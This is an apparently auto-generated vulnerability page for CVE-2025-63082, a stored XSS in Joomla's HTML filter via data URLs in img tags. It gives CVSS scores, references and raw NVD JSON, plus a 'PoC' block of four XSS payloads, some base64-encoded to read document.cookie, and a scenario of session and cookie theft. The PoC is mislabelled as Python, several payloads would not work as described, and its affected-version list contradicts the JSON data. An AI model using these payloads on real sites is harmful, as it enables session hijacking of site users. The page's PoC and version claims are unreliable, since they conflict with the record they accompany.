CVE-2025-63082

Description

Lack of input filtering leads to an XSS vector in the HTML filter code related to data URLs in img tags.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* - VULNERABLE

Joomla Core < 3.10.x (需确认官方修复版本)

Joomla Core < 4.x.x (需确认官方修复版本)

Joomla Core < 5.x.x (需确认官方修复版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-63082 PoC - Data URL XSS in Joomla Core HTML Filter -->
<!-- Stored XSS via img tag with data URL -->

<!-- Method 1: Direct JavaScript in data URL -->
<img src="data:text/html,<script>alert('XSS')</script>" />

<!-- Method 2: Base64 encoded payload -->
<img src="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+" />

<!-- Method 3: Using event handlers with data URL -->
<img src="x" onerror="eval(atob('YWxlcnQoJ1hTUycp'))" />

<!-- Method 4: SVG with script injection via data URL -->
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pjwvc3ZnPg==" />

<!-- Exploitation scenario -->
<!-- 1. Attacker creates/edits content in Joomla with malicious img tag -->
<!-- 2. Content is saved and stored in database -->
<!-- 3. When other users view the page, the data URL is processed -->
<!-- 4. Browser executes the embedded JavaScript code -->
<!-- 5. Attacker's script can steal cookies, session tokens, etc. -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63082
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63082
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63082/
[4] VulDB https://vuldb.com/cve/CVE-2025-63082
[5] https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63082", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:44.590", "lastModified": "2026-01-30T18:41:18.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lack of input filtering leads to an XSS vector in the HTML filter code related to data URLs in img tags."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.4.2", "matchCriteriaId": "487DAEED-2D0D-4763-8D4E-88FEA04AF646"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.2", "matchCriteriaId": "2F4806EE-198C-41D0-B4F6-81D6C9A3DE79"}]}]}], "references": [{"url": "https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}